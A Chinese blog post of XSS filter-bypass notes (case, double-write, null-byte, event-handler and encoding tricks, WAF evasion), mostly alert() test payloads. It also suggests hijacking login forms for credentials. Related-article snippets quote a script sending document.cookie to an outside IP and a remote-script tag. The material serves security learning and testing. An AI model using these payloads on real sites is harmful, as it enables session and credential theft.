xss利用绕过

最新推荐文章于 2024-05-29 19:11:35 发布
最新推荐文章于 2024-05-29 19:11:35 发布
阅读量683 收藏
点赞数
分类专栏: 基本web漏洞笔记 # xss 文章标签: xss web安全 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MAPLE102424/article/details/124737136
版权

XSS绕过

代码过滤

  • html标签转义规则如下:
    < 转成 &lt;
    > 转成 &gt;
    & 转成 &amp;
    " 转成 &quot;
    ’ 转成 &#39

  • javascrpt事件转义规则
    \ 转成 \\
    / 转成 \/
    ; 转成 ;(全角;)

  • URL属性
    如果 <script>, <style>, <imt> 等标签的 src 和 href 属性值为动态内容,那么要确保这些url没有执行恶意连接。确保:href 和 src 的值必须以 http://开头,白名单方式;不能有10进制和16进制编码字符

自身标签绕过

<script>alert('xss')</script> //**没有过滤**
<Script>alert('xss')</Script> //**大小写绕过**
<scscriptript>alert('xss')</scscriptript> //**双写绕过**
<sc\x00ript>alert('xss')</sc\x00ript> //**空字节绕过**


' onclick='alert(1) //**闭合绕过(对于html实体输入的和过滤< >)**

其他标签绕过

<a herf="javascript:alert(1)">show</a> //链接标签

<IMG SRC=javascript:alert(‘XSS’)>   //图片xss

<body onload=alert(1)> //文档加载完成后
<input type=image src=x:x onerror=alert(1)> //图片等媒体加载失败后
<form oninput=alert(1)><input></form> //表单输入
<textarea autofocus onfocus=alert(1)> // 自动获得焦点的文本区域
<input oncut=alert(1)> //用户剪切元素内容时

总而言之就是html标签的DOM事件后面可以添加js脚本,从而可以插入xss

DOM事件

编码绕过

BASE64,Unicode编码,url编码,ascii码,hex,2,8,16进制

接收参数绕过

http头部 referer User-Agent 发送方式get post 等

httponly

如果在cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS攻击 ,只是无法获取Cookie信息,xss脚本还是会执行。
//JAVAEE
response.setHeader(“Set-Cookie”, “cookiename=value;
Path=/;Domain=domainvalue;Max-Age=seconds;HTTPOnly”);
//这样js脚本是获取不到Cookie,而可以用request对象接收
Cookie cookies[]=request.getCookies();

原理是 Cookie都是通过document对象获取的,那HttpOnly就是在设置cookie时接受这样一个参数,在浏览器的document对象中就看不到cookie了。Cookie会被放在浏览器头中发送出去(包括Ajax的时候),对于一些敏感的Cookie我们采用HttpOnly,对于一些需要在应用程序中用JS操作的cookie我们就不予设置,这样就保障了Cookie信息的安全也保证了应用。
我们实现xss的目的是为了获取用户的信息来登录管理员后台 ,而登录后台一般需要Cookie或者账号密码,在设置httponly后获取不了Cookie,我们从账号密码入手。

密码未保存时
在登录界面插入xss表单劫持,把账号密码获取到xss平台
密码保存时
在后台界面插入xss获取浏览器存储的用户账号密码数据

WAF拦截

手工绕过

  • 标签语法替换
    html的标签 <a href=>

  • 特殊符号干扰
    / # @

  • 提交方式更改
    不仅要看waf过滤的方式,还有服务器接收的方式。

  • 垃圾数据溢出

  • 加解密算法
    加密之后在发送,要看服务器能否识别该编码。

  • 结合其他漏洞绕过
    绕过姿势

自动化xss

xssStrike使用

fuzz

xssfuzzer 平台链接

MAPLE...
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss练习——获取cookie绕过登录名密码
haoaaao的博客
01-22 968
1、脚本实现功能:将被攻击方cookie发送至黑客 /*****document.write:写入脚本 document.cookie:获取被攻击方cooki img src:get请求返回脚本内容 ****/ <script>document.write('<img src="http://192.168.1.32:8023/?'+document.cookie+'"/>')</script> ...
WEB漏洞-XSS跨站之代码绕过与httpOnly绕过
硫酸超的博客
08-16 4274
什么是HttpOnly? 如果您在cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS攻击,具体一点的介绍请google进行搜索。 介绍 PHP设置COOKIE的HttpOnly属性 作用:仅仅是防止通过js脚本读取到cookie信息 虽然设置了httponly之后拿不到cookie,但是还是存在xss跨站语句,阻止的仅仅是获取cookie 对方开启HttpOnly你在盗取cookie失败的情况下可以采用其他方案 登陆后台权限方式 1.以cooki
【网络安全】XSS绕过HttpOnly实现帐户接管
最新发布
等风来
05-29 812
fetch 方法是JavaScript中用于发起网络请求的现代 API,实现从网络中获取资源(如文本、JSON、Blob 等)。url 是要发送请求的 URL,而 options 则是一个包含各种配置选项的对象,例如请求方法、请求头、身份验证信息等。fetch 方法返回一个 Promise,该 Promise 在收到响应后会解析为 Response 对象。通过对 Response 对象执行方法和访问属性,可以获取响应的状态、头信息和内容。
【每天学习一点新知识】XSS如何绕过HttpOnly获取Cookie以及XSS与CORS漏洞利用
RexHa的博客
10-27 5454
Cors请求可分为两类,简单请求和非简单请求。所谓简单请求,就是请求方式为GET,POST,HEAD这三种之一,并且HTTP头不超出(Accept,Accept-Language,Content-Language,Lat-Event-ID,Content-Type)这几种字段。(Cross-origin resource sharing),是H5提供的一种机制,WEB应用程序可以通过在HTTP增加字段来告诉浏览器,哪些不同来源的服务器是有权访问本站资源的,当不同域的请求发生时,就出现了跨域的现象。
XSS绕过技巧
weixin_52501704的博客
02-10 3068
XSS绕过技巧
xss绕过
weixin_51692662的博客
08-19 2586
xss绕过
XSSBypass:XSS绕过技术
05-17
XSS绕过技术是安全研究人员和黑客为了测试或利用这些漏洞而发展出的一系列策略。 1. **理解XSS类型** - 存储型XSS:攻击者的脚本被存储在服务器上,然后在多个用户访问同一页面时触发。 - 反射型XSS:脚本通过URL...
记录几种XSS绕过方式1
08-03
本文主要记录了几种XSS绕过的方法,帮助开发者理解攻击者可能使用的技巧,提高网站的安全性。 1. 服务端全局替换为空的特性: 当网站的过滤机制将某些特定字符如"onerror"或"script"替换为空时,攻击者可以利用...
第十三节 利用CSS特性绕过XSS过滤-01
09-15
利用CSS特性绕过XSS过滤 在Web安全领域中,XSS(Cross-Site Scripting)是一种常见的攻击方式,它通过在目标网站中插入恶意脚本来攻击用户。为了防止XSS攻击,很多网站都部署了XSS过滤机制。但是,攻击者可以利用...
第十二节 利用IE特性绕过XSS过滤-01
09-15
在本节课程中,我们将讨论如何利用 IE 特性绕过 XSS 过滤,并对应不同的 XSS 攻击场景,包括 XSS 漏洞发现、基本 XSS 利用、IE 特性讲解和 Payload 触发 XSSXSS 漏洞发现 XSS 漏洞发现是指在目标网站中查找可能...
第十四节 IE中利用CSS触发XSS-01
09-15
"IE中利用CSS触发XSS-01" 在IE浏览器中,CSS可以用来触发XSS攻击。本节课程将介绍如何使用CSS来触发XSS。 CSS介绍 CSS(Cascading Style Sheets)是一种用来表现HTML或XML文件样式的计算机语言。CSS不仅可以静态...
XSS常见的绕过手法
Redredredfish的博客
12-07 1万+
XSS常见的绕过手法 大小写绕过 HTML对标签大小写不敏感,可以利用大小写混用绕过 例如:<script>改为<ScRiPt> 双写绕过 有些情况的规则会将黑名单标签替换为空,可以利用这一点构造标签 例如:<script>改为<scr<script>ipt> 同理某些注释符在规则中也会替换为空,这时候可以利用它构造payload 例如:<script>改为<scr<!---test--->ipt> 开口标签 在
45. XSS篇——XSS过滤绕过技巧
热门推荐
Fly_鹏程万里
03-20 2万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 改变大小写 在测试过程中,我们可以改变测试语句的大小写来绕过XSS规则: 比如:<script>alert(“xss”);</script>可以...
xss绕过代码后端长度限制的方法
qq_26243045的博客
02-15 328
一般来讲程序对于输入字符长度进行限制的方法主要分两种,一种是前端的长度限制,这种的绕过只需要修改前端源码即可,或者本地构造一个表单。 本次审计的这套CMS存在一个XSS漏洞,由于日志入库验证不严格导致存在该漏洞,只需要尝试登陆即可写入payload。
我的渗透笔记之XSS绕过技巧
xf555er的博客
03-03 1万+
1、单引号、双引号和尖括号之间的闭合。 有些标签例如,构造的payload应该为” >,那么组成的标签为<input value=""><script>alert(1)</script>" 2、尖括号被转义,利用注释符号和一些属性事件. 例如,构造payload为" οnclick=alert(1)//,组成的标签为<input value="" o...
XSS 绕过常用语句
Mr.Huang_的博客
09-16 2591
XSS 绕过常用语句 写在最前面::: 下文中 alert 都可以由 prompt 代替 最常用的 XSS 漏洞测试代码: <script>prompt("XSS")</script> <SCRIPT SRC=http://damit5.ml/xss.js></SCRIPT> 在输入(Input)标签里 <INPUT type="text" value='<SCRIPT>alert("XSS")</SCRIPT>'>
XSS遇到后台登录限制或者HTTPONLY时
xysoul的专栏
04-29 9546
http://www.hack80.com/thread-965-1-1.html 0x01 前言         XSS确实是个好东西,往往能在我们没有头绪的时候带来一丝曙光,宛如拿站途中的一轮明月,又如饥饿时的一块小曲奇(cookie)~         然而,我们却时常遇到形如限制登录,HTTPONLY等拦路虎,这时,很多机油可能觉得XSS就没什么用了。
XSS绕过演示
weixin_44720762的博客
05-12 221
尽管网页构建人员在构建网站时会考虑到安全措施,但很有可能因为程序不够严谨或使用的方法本身存在错误导致这些安全措施虽然存在但任然是可以被绕过的。 具体例子 很多的安全措施如果仅仅只是被放在前端,这或许在一定程度上会起到一些保护作用,但也仅仅只是对于非专业的渗透人员有用,一但攻击者对网页攻击有一定的认识,设置在前端的安全措施是没有任何作用的。 例如字符输入的长度限制,如果限制操作仅仅被放在了前端,这完...
Cookie中设置了 HttpOnly,Secure 属性,有效的防止XSS攻击,X-Frame-Options 响应头避免点击劫持...
weixin_34214500的博客
12-14 2320
属性介绍: 1) secure属性当设置为true时,表示创建的 Cookie 会被以安全的形式向服务器传输(ssl),即 只能在 HTTPS 连接中被浏览器传递到服务器端进行会话验证, 如果是 HTTP 连接则不会传递该信息,所以不会被窃取到Cookie 的具体内容。 2 )HttpOnly属性如果在Cookie中设置了"HttpOnly"属性,那么通过程序(JS脚本、Applet等)...
dvwa中利用xss漏洞绕过csrf漏洞
05-20
在DVWA中,可以使用以下步骤来利用XSS漏洞绕过CSRF漏洞: 1. 打开DVWA,进入CSRF页面。在这个页面上,你将需要创建一个新的帖子。 2. 在新帖子的标题中,我们可以插入一段XSS代码,例如:`<script>document.forms...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值